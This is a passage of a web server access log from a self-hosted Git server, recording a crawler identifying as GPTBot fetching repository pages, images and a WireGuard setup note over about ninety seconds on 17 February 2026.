"Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images" +[17/Feb/2026:13:39:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 10845] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images" +[17/Feb/2026:13:39:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 14699] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components" +[17/Feb/2026:13:39:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 10849] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images" +[17/Feb/2026:13:39:12 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/pages/assets/js/script.js" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/pages/DCS.html" +[17/Feb/2026:13:39:13 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/pages/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/pages/DCS.html" +[17/Feb/2026:13:39:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/index.html" [Client 74.7.227.38] [Length 9877] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/index.html" +[17/Feb/2026:13:39:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" [Client 74.7.227.38] [Length 2253] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" +[17/Feb/2026:13:39:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/index.html" [Client 74.7.227.38] [Length 17807] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/index.html" +[17/Feb/2026:13:39:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" [Client 74.7.227.38] [Length 14877] [Gzip 8.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" +[17/Feb/2026:13:39:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 7692333] [Gzip 11.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom3.png" +[17/Feb/2026:13:39:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 5498818] [Gzip 11.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom5.png" +[17/Feb/2026:13:39:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 5498816] [Gzip 11.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom5.png" +[17/Feb/2026:13:39:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 9887] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom3.png" +[17/Feb/2026:13:39:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 6429933] [Gzip 11.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom1.png" +[17/Feb/2026:13:39:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 9887] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom1.png" +[17/Feb/2026:13:39:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 9886] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom5.png" +[17/Feb/2026:13:39:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 9886] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom5.png" +[17/Feb/2026:13:39:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/index.html" +[17/Feb/2026:13:39:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 10847] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images" +[17/Feb/2026:13:39:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 10848] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images" +[17/Feb/2026:13:39:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 10848] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images" +[17/Feb/2026:13:39:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 10848] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images" +[17/Feb/2026:13:39:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.html" +[17/Feb/2026:13:39:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 10848] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images" +[17/Feb/2026:13:39:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 14592] [Gzip 6.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Services.tsx" +[17/Feb/2026:13:39:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 10848] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images" +[17/Feb/2026:13:39:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/index.html" +[17/Feb/2026:13:39:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 2082919] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom1.png" +[17/Feb/2026:13:39:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 1774975] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom5.png" +[17/Feb/2026:13:39:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 6429932] [Gzip 11.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom1.png" +[17/Feb/2026:13:40:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 6429927] [Gzip 11.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom1.png" +[17/Feb/2026:13:40:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 7641792] [Gzip 11.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom2.png" +[17/Feb/2026:13:40:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 6508437] [Gzip 12.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom6.png" +[17/Feb/2026:13:40:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 9886] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom2.png" +[17/Feb/2026:13:40:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 6508446] [Gzip 12.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom6.png" +[17/Feb/2026:13:40:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom6.png" +[17/Feb/2026:13:40:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 7692331] [Gzip 11.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom3.png" +[17/Feb/2026:13:40:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 9886] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom3.png" +[17/Feb/2026:13:40:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 9886] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom1.png" +[17/Feb/2026:13:40:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 9886] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom6.png" +[17/Feb/2026:13:40:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom1.png" +[17/Feb/2026:13:40:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 2483659] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom2.png" +[17/Feb/2026:13:40:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 2082919] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom1.png" +[17/Feb/2026:13:40:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 2082919] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom1.png" +[17/Feb/2026:13:40:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 2102057] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom6.png" +[17/Feb/2026:13:40:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 10853] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images" +[17/Feb/2026:13:40:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 10847] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images" +[17/Feb/2026:13:40:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/index.html" +[17/Feb/2026:13:40:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 1774975] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom5.png" +[17/Feb/2026:13:40:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 2102057] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom6.png" +[17/Feb/2026:13:40:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 10843] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images" +[17/Feb/2026:13:40:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr 